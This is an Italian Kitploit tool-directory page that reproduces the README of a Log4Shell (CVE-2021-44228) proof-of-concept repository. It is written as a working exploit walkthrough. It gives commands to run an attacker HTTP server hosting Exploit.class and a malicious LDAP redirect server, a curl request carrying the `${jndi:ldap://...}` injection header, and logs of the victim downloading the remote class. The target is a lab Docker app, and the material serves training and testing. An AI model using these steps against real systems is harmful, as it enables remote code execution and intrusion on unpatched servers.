Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228 — PoC per CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/marcourbano/cve-2021-44228
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

PoC per CVE-2021-44228.

Vedi Repository
773 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4Shell POC (CVE-2021-44228)

Lo scopo di questo repository è fornire tutti i componenti necessari per sfruttare CVE-2021-44228, soprannominata Log4Shell,
e mostrare come sfruttarla.

Gli ingredienti necessari per sfruttare questa vulnerabilità sono i seguenti:

  1. Un server LDAP che reindirizzerà l'applicazione vulnerabile verso l'exploit.
  2. Un'applicazione vulnerabile (applicazione web Spring Boot vulnerabile a CVE-2021-44228) che utilizza una versione vulnerabile di Log4J.
  3. La classe Java Exploit.class (e il corrispondente file Exploit.java) che verrà caricata dall'applicazione vulnerabile.
  4. Un server http dal quale l'applicazione vulnerabile scaricherà il dannoso Exploit.class

Crediti:

  • Il server LDAP è stato estratto dal repository Marshalsec di mbechler.
  • L'applicazione vulnerabile è quella fornita da christophetd.

Prerequisiti:

  • Maven
  • Java
  • Docker
  • Python

Esecuzione del server LDAP e del server HTTP

server HTTP

1. Spostarsi nella cartella exploit e avviare il server http tramite Python.

root@kitploit:~
python3 -m http.server PORT

server LDAP

1. Spostarsi nella cartella ldap_server e compilare il pom.xml

root@kitploit:~
mvn clean package -DskipTests

2. Spostarsi nella cartella target e avviare il server specificando http_server_ip e http_server_port

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

Nota: questo comando esegue il server ldap malevolo imponendogli di rispondere con l'URI di Exploit.class a ogni query ldap.

Esecuzione dell'applicazione vulnerabile

Eseguire il container docker dell'applicazione vulnerabile

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Nota: di default eseguiamo l'applicazione vulnerabile sulla porta 8080, sentiti libero di cambiarla.

Sfruttamento della vulnerabilità

Una volta che l'applicazione_vulnerabile, il server_ldap e il server_http sono in esecuzione, inviare una richiesta http malevola al server vulnerabile.

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

L'applicazione_vulnerabile registrerà il payload ed eseguirà una query ldap

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

Il server_ldap risponderà con l'URI di Exploit.class

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

Il server_http riceverà una richiesta per Exploit.class

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

Infine, possiamo verificare che l'exploit abbia creato un nuovo file nel filesystem della vittima. In questo esempio dobbiamo controllare il filesystem del container docker.

Riferimenti

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

Collaboratori

@CrashOverflow

Scarica lo strumento